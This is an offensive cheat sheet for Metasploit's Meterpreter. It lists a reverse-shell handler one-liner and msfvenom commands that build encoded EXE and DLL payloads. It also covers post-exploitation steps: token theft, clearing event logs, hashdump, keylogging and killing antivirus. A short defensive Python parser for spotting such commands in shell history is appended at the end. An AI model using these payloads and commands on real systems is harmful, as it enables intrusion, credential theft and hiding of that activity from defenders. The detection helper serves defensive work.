You can start msfconsole and a listener without any hassle in a single one-liner:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.1; set LPORT 443; run"
List the Meterpreter sessions running in the background and interact with one by its id:
sessions -l
sessions -i ${session id}
System commands for Meterpreter
sysinfo
shows system information about the target
getuid
shows the username the Meterpreter session is running as
kill ${pid}
kills the specified process
ps
lists all running processes
shell
spawns a system shell on the target
execute -f ${file} [Options]
-H creates the process hidden from view
-a passes arguments to the command
-i interacts with the process after creating it
-m executes from memory
-t executes with the currently impersonated token
clearev
clears the event logs on the target
steal_token ${pid}
attempts to steal the impersonation token of the specified process
Networking
Networking commands:
- portfwd
- route
- ipconfig
Additional functionality
Load additional Meterpreter extensions with load ${extension}:
- espia : desktop spying and screenshots
- incognito : user impersonation via tokens
- priv : privilege helpers such as hashdump
- sniffer : network traffic sniffing
Meterpreter scripts
Run a Meterpreter script with run ${script}:
- checkvm
- killav
- credcollect
- metsvc
- get_local_subnets
- migrate
- getcountermeasure
- netenum
- getgui
- prefetchtool
- gettelnet
- hashdump
- scheduleme
- keylogrecorder
- winenum
- vnc_oneport/vnc
Reference
Huge thanks to blueliv.com
https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf
# exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -a x86 --platform windows -e x86/shikata_ga_nai -i 4 --smallest > 32bit_shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -a x64 --platform windows -e x64/zutto_dekiru -i 2 > 64bit_shell.exe
# dll
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=127.0.0.1 LPORT=4444 > reverse_32bit.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll LHOST=127.0.0.1 LPORT=4444 > reverse_64bit.dll
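As an added example from the defender's side (not part of the cheat sheet or the blueliv reference), here is a small Python triage helper that parses msfvenom and msfconsole command lines like the handler one-liner and the payload builds above, as they turn up in shell history or process-creation telemetry, and pulls out the payload, C2 address, encoder and output file. The sample history is constructed from this page's own lines; the function names are mine.

```python
import re
import shlex

# msfvenom flags that take a value; the attached form (-ax86) is accepted as well.
VALUE_FLAGS = {"-p": "payload", "-a": "arch", "-e": "encoder", "-i": "iterations",
               "-f": "format", "--platform": "platform"}
KV_KEYS = {"LHOST", "LPORT"}  # payload options given as KEY=value
def parse_msfvenom(toks):
    """Extract payload, C2 address, encoder and output file from msfvenom tokens."""
    out, i = {"tool": "msfvenom"}, 0
    while i < len(toks):
        t = toks[i]
        if t in VALUE_FLAGS and i + 1 < len(toks):        # "-a x86"
            out[VALUE_FLAGS[t]] = toks[i + 1]
            i += 1
        elif len(t) > 2 and t[:2] in VALUE_FLAGS:         # "-ax86"
            out[VALUE_FLAGS[t[:2]]] = t[2:]
        elif "=" in t and t.split("=", 1)[0] in KV_KEYS:  # "LHOST=..."
            out[t[:t.index("=")].lower()] = t[t.index("=") + 1:]
        elif t == ">" and i + 1 < len(toks):              # redirected output file
            out["output"] = toks[i + 1]
            i += 1
        i += 1
    return out
def parse_msfconsole(toks):
    """Extract module and PAYLOAD/LHOST/LPORT from an 'msfconsole -x "..."' one-liner."""
    out = {"tool": "msfconsole"}
    script = toks[toks.index("-x") + 1] if "-x" in toks[:-1] else ""
    for stmt in script.split(";"):
        m = re.match(r"\s*(use|set)\s+(\S+)(?:\s+(\S+))?", stmt)
        if m and m.group(1) == "use":
            out["module"] = m.group(2)
        elif m and m.group(3) is not None:
            out[m.group(2).lower()] = m.group(3)
    return out
def parse_command_line(cmd):
    """Dispatch on the program basename, so /opt/metasploit/msfvenom also matches."""
    toks = shlex.split(cmd)
    names = {t.rsplit("/", 1)[-1] for t in toks}
    if "msfvenom" in names:
        return parse_msfvenom(toks)
    return parse_msfconsole(toks) if "msfconsole" in names else None
def triage(lines):  # one record per Metasploit invocation found in history or process logs
    return [r for r in map(parse_command_line, lines) if r]
# Constructed sample: two of the cheat sheet's own lines plus a benign command.
SAMPLE_HISTORY = [
    'sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.1; set LPORT 443; run"',
    "msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=127.0.0.1 LPORT=4444 > reverse_32bit.dll",
    "ls -la",
]
```

Calling triage(SAMPLE_HISTORY) yields two records (the handler and the DLL build) and skips the benign command, which is enough to feed a hunt query or an alert enrichment step.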